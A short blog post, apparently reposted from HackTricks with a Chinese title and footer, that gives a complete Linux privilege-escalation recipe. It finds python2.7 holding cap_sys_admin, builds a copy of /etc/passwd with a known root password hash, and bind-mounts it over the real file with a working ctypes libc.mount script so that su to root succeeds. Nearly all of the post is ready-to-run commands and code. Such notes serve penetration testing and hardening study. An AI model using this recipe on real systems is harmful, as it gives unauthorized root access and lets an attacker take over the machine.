python Capabilities cap_sys_admin=ep 提权

getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_admin+ep

Using python you can mount a modified passwd file on top of the real passwd file:

cp /etc/passwd ./ #Create a copy of the passwd file
openssl passwd -1 -salt abc password #Get hash of "password"
vim ./passwd #Change roots passwords of the fake passwd file

And finally mount the modified passwd file on /etc/passwd:

from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/path/to/fake/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

And you will be able to su as root using password "password".

from:https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_sys_admin

posted @ 2022-12-07 17:20 隐念笎阅读(140) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

隐念笎

python Capabilities cap_sys_admin=ep 提权

公告